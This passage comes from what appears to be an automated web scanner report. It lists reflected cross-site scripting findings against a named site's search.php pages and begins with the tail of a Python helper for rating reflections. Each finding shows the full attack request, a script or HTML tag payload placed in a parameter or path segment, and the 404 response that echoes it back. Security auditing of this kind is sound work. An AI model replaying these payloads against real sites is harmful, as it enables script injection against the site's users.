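def script_stripped_404(canary: str) -> str:
    """A handler that strips <script> but leaves other tags: the case the
    scanner reports as Firm rather than Certain."""
    return raw_404(canary.replace("<script>", "").replace("</script>", ""))


if __name__ == "__main__":
    for name, handler in (("raw", raw_404), ("escaped", escaped_404),
                          ("script-stripped", script_stripped_404)):
        print(f"{name:16s} -> {assess(handler)}")
```

`assess()` returns "Certain" for the verbatim handler, "Firm" for the one that only strips `<script>`, and `None` once the URI is encoded; `classify_reflection()` on its own is what to run against a saved response when re-validating a single finding.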

2.3443. http://www.resellerbase.com/detail/5/themes/kosmos/images/search.php [keyword parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/5/themes/kosmos/images/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload 9a7d8<a>7ceb0bca802 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/5/themes/kosmos/images/search.php?keyword=search...9a7d8<a>7ceb0bca802&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/5/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:03:10 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/5/themes/kosmos/images/search.php?keyword=search...9a7d8<a>7ceb0bca802&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3444. http://www.resellerbase.com/detail/5/themes/kosmos/images/search.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/5/themes/kosmos/images/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 831ea<script>alert(1)</script>263bc02cb2e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/5/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2&831ea<script>alert(1)</script>263bc02cb2e=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/5/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:05:11 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/5/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2&831ea<script>alert(1)</script>263bc02cb2e=1 was not found on this server.</p>
...[SNIP]...

2.3445. http://www.resellerbase.com/detail/5/themes/kosmos/images/search.php [opt parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/5/themes/kosmos/images/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 95ab5<a>c501ccfe91e was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/5/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=295ab5<a>c501ccfe91e HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/5/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:03:54 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/5/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=295ab5<a>c501ccfe91e was not found on this server.</p>
...[SNIP]...

2.3446. http://www.resellerbase.com/detail/5/themes/kosmos/search.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/5/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 372cf<script>alert(1)</script>3d4455adbf8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail372cf<script>alert(1)</script>3d4455adbf8/5/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/5/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:05:20 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail372cf<script>alert(1)</script>3d4455adbf8/5/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3447. http://www.resellerbase.com/detail/5/themes/kosmos/search.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/5/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload b6cbf<script>alert(1)</script>72940385d0a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/5b6cbf<script>alert(1)</script>72940385d0a/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/5/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:05:32 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/5b6cbf<script>alert(1)</script>72940385d0a/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3448. http://www.resellerbase.com/detail/5/themes/kosmos/search.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/5/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload b225d<script>alert(1)</script>00b6de66bcb was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/5/themesb225d<script>alert(1)</script>00b6de66bcb/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/5/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:05:44 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/5/themesb225d<script>alert(1)</script>00b6de66bcb/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3449. http://www.resellerbase.com/detail/5/themes/kosmos/search.php [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/5/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 43b43<script>alert(1)</script>a62f7b8679d was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/5/themes/kosmos43b43<script>alert(1)</script>a62f7b8679d/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/5/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:06:04 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/5/themes/kosmos43b43<script>alert(1)</script>a62f7b8679d/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3450. http://www.resellerbase.com/detail/5/themes/kosmos/search.php [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/5/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload f60b3<script>alert(1)</script>83f59bd0f93 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/5/themes/kosmos/search.phpf60b3<script>alert(1)</script>83f59bd0f93?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/5/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:06:19 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/5/themes/kosmos/search.phpf60b3<script>alert(1)</script>83f59bd0f93?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3451. http://www.resellerbase.com/detail/5/themes/kosmos/search.php [Submit3 parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/5/themes/kosmos/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 4da86<a>b14191ee053 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/5/themes/kosmos/search.php?keyword=search...&Submit3=Search4da86<a>b14191ee053&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/5/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:03:27 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/5/themes/kosmos/search.php?keyword=search...&Submit3=Search4da86<a>b14191ee053&opt=2 was not found on this server.</p>
...[SNIP]...

2.3452. http://www.resellerbase.com/detail/5/themes/kosmos/search.php [keyword parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/5/themes/kosmos/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload 7770d<a>e1fc914f70d was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/5/themes/kosmos/search.php?keyword=search...7770d<a>e1fc914f70d&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/5/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:03:09 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/5/themes/kosmos/search.php?keyword=search...7770d<a>e1fc914f70d&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3453. http://www.resellerbase.com/detail/5/themes/kosmos/search.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/5/themes/kosmos/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 43577<script>alert(1)</script>62b03df77e8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/5/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2&43577<script>alert(1)</script>62b03df77e8=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/5/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:04:48 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/5/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2&43577<script>alert(1)</script>62b03df77e8=1 was not found on this server.</p>
...[SNIP]...

2.3454. http://www.resellerbase.com/detail/5/themes/kosmos/search.php [opt parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/5/themes/kosmos/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload d433f<a>e327faffbb2 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/5/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2d433f<a>e327faffbb2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/5/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:03:42 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/5/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2d433f<a>e327faffbb2 was not found on this server.</p>
...[SNIP]...

2.3455. http://www.resellerbase.com/detail/5/themes/search.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/5/themes/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload adda1<script>alert(1)</script>1f5ec8079cd was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detailadda1<script>alert(1)</script>1f5ec8079cd/5/themes/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/5/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:05:32 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detailadda1<script>alert(1)</script>1f5ec8079cd/5/themes/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3456. http://www.resellerbase.com/detail/5/themes/search.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/5/themes/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 860ad<script>alert(1)</script>b234bbfe6a6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/5860ad<script>alert(1)</script>b234bbfe6a6/themes/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/5/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:05:48 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/5860ad<script>alert(1)</script>b234bbfe6a6/themes/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3457. http://www.resellerbase.com/detail/5/themes/search.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/5/themes/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 1126e<script>alert(1)</script>3d62e29c64d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/5/themes1126e<script>alert(1)</script>3d62e29c64d/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/5/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:05:59 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/5/themes1126e<script>alert(1)</script>3d62e29c64d/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3458. http://www.resellerbase.com/detail/5/themes/search.php [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/5/themes/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 60ef8<script>alert(1)</script>d9f63b09d1e was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/5/themes/search.php60ef8<script>alert(1)</script>d9f63b09d1e?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/5/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:06:17 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/5/themes/search.php60ef8<script>alert(1)</script>d9f63b09d1e?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3459. http://www.resellerbase.com/detail/5/themes/search.php [Submit3 parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/5/themes/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 929e2<a>35e811e03f5 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/5/themes/search.php?keyword=search...&Submit3=Search929e2<a>35e811e03f5&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/5/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:03:36 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/5/themes/search.php?keyword=search...&Submit3=Search929e2<a>35e811e03f5&opt=2 was not found on this server.</p>
...[SNIP]...

2.3460. http://www.resellerbase.com/detail/5/themes/search.php [keyword parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/5/themes/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload 552d4<a>9b19d41fa6f was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/5/themes/search.php?keyword=search...552d4<a>9b19d41fa6f&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/5/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:03:21 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
